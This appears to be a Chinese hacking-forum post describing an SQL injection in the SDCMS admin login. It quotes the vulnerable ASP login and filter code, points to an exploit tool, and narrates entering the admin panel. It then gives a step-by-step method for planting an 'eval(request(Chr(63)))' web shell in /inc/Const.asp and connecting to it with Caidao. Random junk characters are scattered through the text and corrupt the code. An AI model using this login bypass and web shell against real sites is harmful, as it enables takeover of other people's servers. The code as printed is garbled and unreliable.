作者:T00LS 鬼哥
- |0 n) a! Y) o. n* m3 Y' W漏洞文件:后台目录/index.asp( Z) q9 a) d( p3 v4 V; Y) N
' K) e7 x- j; M) V& @ H
Sub Check
, {; K* E" A, Q Dim username,password,code,getcode,Rs
) u8 f+ O* N0 Q- N: j% K IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
& \; q# d& d4 B5 z7 Y' o username=FilterText(Trim(Request.Form("username")),1)
[; A: @' C: n- A8 {% I password=FilterText(Trim(Request.Form("password")),1)
( _5 z- [. S1 e- \ code=Trim(Request.Form("yzm")); i+ ?9 C( a3 c8 v
getcode=Session("SDCMSCode")
* y* ~9 k+ c; y2 n) s4 m IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died# @% v. G# ~ a% x4 c
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied6 m3 q' V; S; a7 l, \- o+ }7 d; m
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
* z% u1 @) v3 c" t0 y( w; A IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
' @0 o$ W! c1 Z& d, Y IF username="" or password="" Then
. r' p6 H8 n: X) G+ v3 t Echo "用户名或密码不能为空"ied! c3 \" C" C8 z& l
Else& h6 X+ J+ A" X; \$ L5 q8 a5 G
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")# t: S" G' @( k6 t- f: a
IF Rs.Eof Then
/ W7 @/ w$ o1 B+ B: B8 o AddLog username,GetIp,"登录失败",1* N0 c, G5 o- r( o! S2 E
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"7 g( e0 x6 H7 O
Else8 e" G' L% b! f( s
Add_Cookies "sdcms_id",Rs(0)8 [$ R9 I2 R8 V6 _: ^
Add_Cookies "sdcms_name",username+ n. u- Q% ?$ y+ U
Add_Cookies "sdcms_pwd",Rs(2)
/ _2 l5 q/ |% j# C0 _0 ?3 X Add_Cookies "sdcms_admin",Rs(3)
1 q" e( M, k( g k0 f. r# O Add_Cookies "sdcms_alllever",Rs(4)
: f# K1 R4 b; e4 q. g$ g Add_Cookies "sdcms_infolever",Rs(5)
* }! f$ h0 L+ Q) y4 h0 b Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")7 l7 G- }* t) Z; H* J# t9 L" U
AddLog username,GetIp,"登录成功",1: h& W; a4 b; Z D4 Y/ ]& l( A" g
'自动删除30天前的Log记录
9 |/ i- `7 p6 h1 w' i2 m# I IF Sdcms_DataType Then, W& X9 H, T# m( u" u! B
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30"): V% y1 g0 _ v. g1 c! c# n
Else
1 K( Z0 W. P; ~9 l$ U) r4 ~ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")8 G" h2 x3 }, R; J; c
End IF1 ^# F; u' B4 k7 M* |6 {3 @5 z9 G. p( I
Go("sdcms_index.asp")& \# Y9 L8 W5 I) N R* [( A
End IF
* K I3 |8 c/ R8 P( G' h1 T Rs.Close
# u8 v6 t8 N3 g Set Rs=Nothing
, {* D- K9 {/ m2 O End IF$ k" w6 h9 H. D3 j& H- }, ?
End Sub7 [4 x3 O( V# b$ P7 y0 h
. P' e, ]2 T# S’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码' q9 _$ j, i: m5 t
+ c; h, ^+ y# m! \2 Q. y+ x
Function FilterText(ByVal t0,ByVal t1)1 ~. E; \$ E$ i
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
5 o$ d) }2 E& H9 N t0=Trim(t0)
1 d0 ^6 O% C' m1 s5 y! r Select Case t1$ |' k, T8 n# K/ Z
Case "1"$ T8 _, U! h( V: V! e6 g
t0=Replace(t0,Chr(32),"")! v+ D$ ^/ b# O8 {6 q& @
t0=Replace(t0,Chr(13),"")8 I# z- o% x! H. M$ L- g# a. r
t0=Replace(t0,Chr(10)&Chr(10),"")% C! d) |1 a. u; A2 G/ I7 O
t0=Replace(t0,Chr(10),"")2 U- z5 n' g! L/ x# A: }* p, k
Case "2"
$ d4 v# `7 R5 B: P( T- y" B7 q t0=Replace(t0,Chr(8),"")'回格6 m0 w2 x n9 I# g5 V; r
t0=Replace(t0,Chr(9),"")'tab(水平制表符)8 \4 f* Y4 Q& ]7 T
t0=Replace(t0,Chr(10),"")'换行
+ N: b+ h( n V( j x$ L* H: v t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
9 K$ d+ K' f S6 ^! k9 F: n t0=Replace(t0,Chr(12),"")'换页
" i+ Z, x( h( m4 B& X t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
1 k, I- ~9 d8 ?7 ^5 b* H* B/ t t0=Replace(t0,Chr(22),"")7 s/ z3 R4 x! s* i3 h2 d. m+ Y
t0=Replace(t0,Chr(32),"")'空格 SPACE
3 p( l7 V8 m6 G- i t0=Replace(t0,Chr(33),"")'!
2 m; V+ l( {/ _( C5 s4 H t0=Replace(t0,Chr(34),"")'"
& y7 j: d1 ~0 b, K t0=Replace(t0,Chr(35),"")'#& q8 E& Q8 k2 ^2 g3 w
t0=Replace(t0,Chr(36),"")'$
) l/ i* K# J8 z. g* A7 g" x t0=Replace(t0,Chr(37),"")'%0 T+ Q( v/ j, h7 p' c G
t0=Replace(t0,Chr(38),"")'&
K: ]: D- p5 E3 a! O t0=Replace(t0,Chr(39),"")''
1 H5 _2 y! Z: M1 K$ a/ i6 n3 m2 B t0=Replace(t0,Chr(40),"")'(
* Q- s! p$ h# G, F0 }+ ]" X t0=Replace(t0,Chr(41),"")')
3 |2 U0 M: R# o1 ^7 } t0=Replace(t0,Chr(42),"")'*/ G2 w& I) m6 H" D% W+ |5 A, B
t0=Replace(t0,Chr(43),"")'+; M O8 x+ C8 _
t0=Replace(t0,Chr(44),"")',
2 y3 b+ u9 O5 O t0=Replace(t0,Chr(45),"")'-0 y, z0 J2 G4 G+ i7 P% L/ G! U
t0=Replace(t0,Chr(46),"")'.
+ g- i9 u& a: Y3 C2 D z* ~1 |! ] t0=Replace(t0,Chr(47),"")'/
5 _ @ N" }+ G4 s* v& Z" c t0=Replace(t0,Chr(58),"")':" H5 D, q' j* \$ H& D' Q9 `% n
t0=Replace(t0,Chr(59),"")';& s0 r4 r4 d9 y& }3 x% Z* e& A
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
" {5 n+ F% x* A; Q- z t0=Replace(t0,Chr(63),"")'?! ~; B F/ q/ J6 w2 {. A
t0=Replace(t0,Chr(64),"")'@
+ c% h* }, [5 g+ h: u t0=Replace(t0,Chr(91),"")'\& i' G& o# r2 x' n0 p7 g( M7 \
t0=Replace(t0,Chr(92),"")'\( q- I* R6 W% Q0 J
t0=Replace(t0,Chr(93),"")']/ `! _7 F. O5 ~5 g0 s) l
t0=Replace(t0,Chr(94),"")'^
. H* K) q/ z: w t0=Replace(t0,Chr(95),"")'_
% D+ P+ k3 m# \9 W' V t0=Replace(t0,Chr(96),"")'`4 G4 A+ z6 ?; Z- W, ^
t0=Replace(t0,Chr(123),"")'{
6 ^6 z' s8 K4 U7 K4 H t0=Replace(t0,Chr(124),"")'|
0 S. c6 i9 t# q t0=Replace(t0,Chr(125),"")'}7 g8 `: ?# G( Q. z/ @, c1 J
t0=Replace(t0,Chr(126),"")'~
) S' ~, s8 T e8 k( T Case Else: u. m3 Z; x" R; x
t0=Replace(t0, "&", "&")
+ x" k1 Z: `6 k3 } t0=Replace(t0, "'", "'"): e) s+ | d9 D6 ~3 y
t0=Replace(t0, """", """)
0 i8 J B: [. M W7 P t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")/ v+ N' D- h, m8 \0 V
End Select
& B8 T% i! l; ~1 U IF Instr(Lcase(t0),"expression")>0 Then% h; G& M; d+ F: V9 Q# B
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)7 k1 C" T% p3 T6 y" a8 z
End If
3 f- l( [ E) X% p) z FilterText=t0
, y# v5 n# W: HEnd Function) O6 |* W( L r# B2 E# O
8 a n) ~+ A% X; j看到没。直接参数是1 只过滤' G" `# H, ?2 @6 b A
t0=Replace(t0,Chr(32)," ")
# ]' @: z6 @& F/ W; @8 |5 X* G t0=Replace(t0,Chr(13),"")" K0 z4 }* U$ Z* s3 D- S' C% h1 u
t0=Replace(t0,Chr(10)&Chr(10),"
5 P2 M0 t5 P Z' j( ?" c8 ?; G")
( s1 N P/ g* Y0 r2 k" Z& w- \( P t0=Replace(t0,Chr(10),"
9 G1 Q. D" D5 h")
3 T2 h! G8 o' B漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
2 [& Y3 \* n( m# k$ ^6 q5 e# FEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
1 O. K- j& l7 E" a# t8 z- N5 ]- v3 T5 ]9 p* D+ P
测试:. H1 _8 Y% J" i5 t
7 Z* @# B" {, ~( N
8 H$ ~9 i) E, a& G6 E* I. z' H现在输入工具上验证码,然后点OK3 L0 x4 n# r% ^2 |' l: m
# i' }7 Z3 m; [+ t. r
2 b$ g6 g( v7 [: \0 [
看到我们直接进入后台管理界面了,呵呵!8 y7 ~3 u9 k: r0 J
) A& a- ]3 o, z0 y4 G4 ~
' N' L; E* D1 o2 z# Z9 K2 p! p$ A1 z0 J$ W( x
这样直接进入后台了。。。。, e6 d; t' E5 Q( M" k# j
6 A1 T; c$ T: W8 B# I1 S5 a( ?( q
; ]; B$ E+ _0 O# ?6 K
8 u5 w# w) S' Y+ G' k+ XSDCMS提权:4 w# h3 o7 b6 K8 a# S5 D* K
7 y6 y/ p2 w, O! T! ]
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?& G B- U/ R1 @, ]$ v6 J
; Q& k( J9 |5 a7 r! q# I9 x( E }
& z# h$ L0 i5 \0 V5 _
, ~3 `# m0 A) w4 s' ~OK,现在用菜刀连接下!
0 h* P4 N D; j4 p( e9 W1 N9 g, k* k" o V5 D
1 u: s; T/ U. X9 @7 N
. R8 |' c$ o/ f, L) v4 B " j# x% `+ I" j( V' C
& G- n8 F* C& G/ Z" \
|